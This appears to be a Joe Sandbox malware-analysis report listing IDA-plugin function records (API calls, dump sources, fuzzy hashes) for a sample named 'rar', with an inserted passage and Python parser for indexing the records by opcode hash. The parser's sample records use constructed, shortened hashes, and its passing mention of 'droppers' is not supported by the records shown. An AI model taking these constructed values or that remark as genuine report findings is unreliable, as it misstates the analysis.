                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Threadwcschr$CreateExceptionPriorityThrow
                                                                                                                                                                                                                                • String ID: CreateThread failed
                                                                                                                                                                                                                                • API String ID: 1217111108-3849766595
                                                                                                                                                                                                                                • Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                                • Instruction ID: 3acd20d6e4c41d6dd9e044724e12f0d4ead31396cbcdc1b4a5e7721378bf34c6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78113D32A18B4282EB05DF14E8411B97360FB84784F544172E6AD827A9FF3DE55FCB40
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3094578987-0
                                                                                                                                                                                                                                • Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                                • Instruction ID: 8d67ddc15e4fdaf7c23c2dbe1e1da6fc8bde23059201b0c96e0051c576989e7d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14F06222648A4682EB609F15F5400796360FB89BD8F044170DEAD467A9EE2DD55F8B00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ConsoleFileHandleModeType
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4141822043-0
                                                                                                                                                                                                                                • Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                                • Instruction ID: 04ce4ff4793491a1cdd57e0feec3adf071de700deb480ce2737d00e7e9b46667
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92E08C20E0460292EB588B25A8A613A12659F4DBC0F4010B4D82FCA3D4FE2ED59E8300
APIs
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
• Instruction ID: a4ae8b04b664a2e2fcb5fbccb676f9be7955df4ac75d177d96b2a3cfd5c8cc1a
• Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
• Instruction Fuzzy Hash: 0BE09A24A0879542EB546B65998537927526F88B81F0054B8CC2E863DAEE3EE85E8260
APIs
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: CharEnvironmentExpandStrings
• String ID:
• API String ID: 4052775200-0
• Opcode ID: a3ba1b03603a475655284a6a52820d5ab219f11978c107c81e75b3572b44f527
• Instruction ID: 3163ec55643f659ec8f5c7933737908d36c39a92f1b143c55d247c15d130aafa
• Opcode Fuzzy Hash: a3ba1b03603a475655284a6a52820d5ab219f11978c107c81e75b3572b44f527
• Instruction Fuzzy Hash: 82E19222A1868287EB608F65D4001BE67A1FB51794F444171EFAE87AEDEF7CE45BC700
APIs
• CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF6FAA37EBE,00000000,00000000,00000000,00000000,00000007,00007FF6FAA37C48), ref: 00007FF6FAA41B8D
• CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF6FAA37EBE,00000000,00000000,00000000,00000000,00000007,00007FF6FAA37C48), ref: 00007FF6FAA41BD7
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
• Instruction ID: d576cc67b8a3d817b43b22e5e1767e576d7ad487c9ec5bd281248e59ad3eb094
• Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
• Instruction Fuzzy Hash: 31311063A1868546E7719F24E4053A966A0FB41BB8F104374EEBC866D9FF7CC88B8700
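The per-function records above (an "APIs" block, the "Memory Dump Source" it came from, the IDA plugin snapshot, and the "Similarity" fields with opcode and instruction fuzzy hashes) follow one fixed text layout, which makes them easy to index: an analyst who keeps the Opcode Fuzzy Hash of every record can match a function in this sample against functions in other reports without re-disassembling anything. The parser below is an added example, not Joe Sandbox's own tooling; it assumes only the layout visible on this page. The records in SAMPLE are constructed in that shape with the hash values shortened, and `index_by_opcode_hash` and `api_summary` are this example's own helpers.

```python
"""Parse Joe Sandbox IDA-plugin function records and index them by opcode fuzzy hash.

Added example, not Joe Sandbox tooling. Assumes the block layout shown in the report:
a record starts at an 'APIs' header and is followed by bullet ('•') lines grouped under
'Memory Dump Source', 'Joe Sandbox IDA Plugin' and 'Similarity' headers.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample in the report's layout; hashes are shortened, not real report values.
SAMPLE = """\
APIs
• CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF6FAA37EBE), ref: 00007FF6FAA41B8D
• CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF6FAA37EBE), ref: 00007FF6FAA41BD7
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 4219d35e49beb692
• Instruction ID: d576cc67b8a3d817
• Opcode Fuzzy Hash: 4219d35e49beb692
• Instruction Fuzzy Hash: 31311063A1868546
APIs
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: dc222732d6090726
• Instruction ID: a4ae8b04b664a2e2
• Opcode Fuzzy Hash: dc222732d6090726
• Instruction Fuzzy Hash: 0BE09A24A0879542
"""

# One resolved call inside an "APIs" block:
#   CreateFileW.KERNELBASE(?,?,00000800,...), ref: 00007FF6FAA41B8D
API_CALL = re.compile(
    r"^(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$"
)


@dataclass
class FunctionRecord:
    """One analysed function: its resolved API calls plus the bullet fields."""
    api_calls: list = field(default_factory=list)  # (name, module, [args], ref)
    fields: dict = field(default_factory=dict)     # key -> [values]; 'Associated' repeats

    def first(self, key, default=""):
        values = self.fields.get(key)
        return values[0] if values else default


def parse_records(text):
    """Split report text into FunctionRecords; a new record begins at each 'APIs' header."""
    records, section, current = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if not line.startswith("•"):
            section = line                      # block header: APIs, Similarity, ...
            if section == "APIs":
                current = FunctionRecord()
                records.append(current)
            continue
        if current is None:                     # bullet before any record: ignore
            continue
        body = line.lstrip("•").strip()
        if section == "APIs":
            m = API_CALL.match(body)
            if m:
                args = m.group("args").split(",") if m.group("args") else []
                current.api_calls.append((m.group("name"), m.group("module"), args, m.group("ref")))
            continue
        key, _, value = body.partition(":")     # first colon only: values contain more colons
        current.fields.setdefault(key.strip(), []).append(value.strip())
    return records


def index_by_opcode_hash(records):
    """Map opcode fuzzy hash -> records: the pivot for matching a function across reports."""
    index = defaultdict(list)
    for rec in records:
        h = rec.first("Opcode Fuzzy Hash")
        if h:
            index[h].append(rec)
    return dict(index)


def api_summary(records):
    """Distinct (api, module) pairs across all records, sorted, for quick triage."""
    return sorted({(name, module) for rec in records for name, module, _, _ in rec.api_calls})


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for h, group in index_by_opcode_hash(recs).items():
        print(h, [r.first("API ID") for r in group])
    print(api_summary(recs))
```

Feeding the full report text through `parse_records` and merging the resulting index with one built from a second report gives the set of opcode hashes shared by both samples, which is the usual starting point for deciding whether two droppers share a runtime or packer. The `api_summary` output also shows which calls were resolved to KERNELBASE rather than the KERNEL32 forwarder, as the CreateFileW pair above is.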
APIs
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: ExceptionThrowstd::bad_alloc::bad_alloc
• String ID:
• API String ID: 932687459-0
• Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
• Instruction ID: 80be6c6a0dcb34c5e36679f8afd2cafef5105e5ef7399cc2c28e7573ce4910d7
• Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
• Instruction Fuzzy Hash: 58216663919F8582EB11CF29D5511B863A0FB98B88B14A371DF5D43656FF38E5FA8300
APIs
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
APIs
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
APIs
• setbuf.LIBCMT ref: 00007FF6FAA37A7B
  • Part of subcall function 00007FF6FAA82AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAA87EF3
• setbuf.LIBCMT ref: 00007FF6FAA37A8F
  • Part of subcall function 00007FF6FAA37B44: GetStdHandle.KERNEL32(?,?,?,00007FF6FAA37A9E), ref: 00007FF6FAA37B4A
  • Part of subcall function 00007FF6FAA37B44: GetFileType.KERNELBASE(?,?,?,00007FF6FAA37A9E), ref: 00007FF6FAA37B56
  • Part of subcall function 00007FF6FAA37B44: GetConsoleMode.KERNEL32(?,?,?,00007FF6FAA37A9E), ref: 00007FF6FAA37B69
  • Part of subcall function 00007FF6FAA82ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAA82AD0
  • Part of subcall function 00007FF6FAA82B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAA82C1C
Similarity
• API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
• String ID:
• API String ID: 4044681568-0
APIs
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
APIs
• GetFileAttributesW.KERNELBASE(00000800,00007FF6FAA4305D,?,?,?,?,?,?,?,?,00007FF6FAA54126,?,?,?,?,00000800), ref: 00007FF6FAA430F0
• GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF6FAA54126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF6FAA43119
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1175261203-0
                                                                                                                                                                                                                                • Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                                • Instruction ID: 03970ef0ba41adcf51f0fe302d0b98a9c9042a1b8c5e9f2fe186f033466dd68a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8FF01262B2858196F7709B20E8153F662A4BF9C7C4F804071E9DDC27D9FF2CD65A8B10
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process$AffinityCurrentMask
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1231390398-0
                                                                                                                                                                                                                                • Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                                                                                • Instruction ID: d6df291164dc82e41fecab5a11594546793d2b1c45a13bc7fc6917b48470c626
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74E02B61B7445147DBD85719C491FA91390AF54BC0F802035F41BC3B94FD1DC4598B00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                                                                                • Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                                • Instruction ID: 8b8f44d1eb98a6863e1fb0a2743f26f1ce7739a73a2eb88b05d0dd05128f3463
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DAE08C60E1E28343FF48ABF2A84417513906F98B80F0440B4DD3ECA3D2FE2CA89B4204
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
